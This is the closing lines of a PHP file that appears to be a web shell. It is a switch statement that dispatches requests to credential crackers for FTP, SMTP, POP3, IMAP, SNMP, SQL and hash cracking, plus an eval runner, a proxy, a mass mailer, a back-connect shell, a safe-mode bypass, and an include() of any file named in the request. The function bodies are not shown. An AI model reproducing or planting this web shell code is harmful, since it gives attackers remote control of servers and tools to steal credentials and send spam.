1398 case 'inc':include ($_REQUEST['filE']);break;
1399 case 'hc':hashcrackeR();break;
1400 case 'fcr':formcrackeR();break;
1401 case 'snmp':snmpcrackeR();break;
1402 case 'sql':sqlcrackeR();break;
1403 case 'auth':authcrackeR();break;
1404 case 'pop3':pop3crackeR();break;
1405 case 'imap':imapcrackeR();break;
1406 case 'smtp':smtpcrackeR();break;
1407 case 'ftp':ftpcrackeR();break;
1408 case 'eval':phpevaL();break;
1409 case 'px':pr0xy();break;
1410 case 'webshell':webshelL();break;
1411 case 'mailer':maileR();break;
1412 case 'br':brshelL();break;
1413 case 'asm':safemodE();break;
1414 case 'mysql':mysqlclienT();break;
1415 case 'calc':calC();break;
1416 case 'sysinfo':sysinfO();break;
1417 case 'checksum':checksuM($_REQUEST['filE']);break;
1418 case 'logout':logouT();break;
1419 default: echo $intro;
1420 }}else echo $intro;
1421 echo $footer;?></body></html>
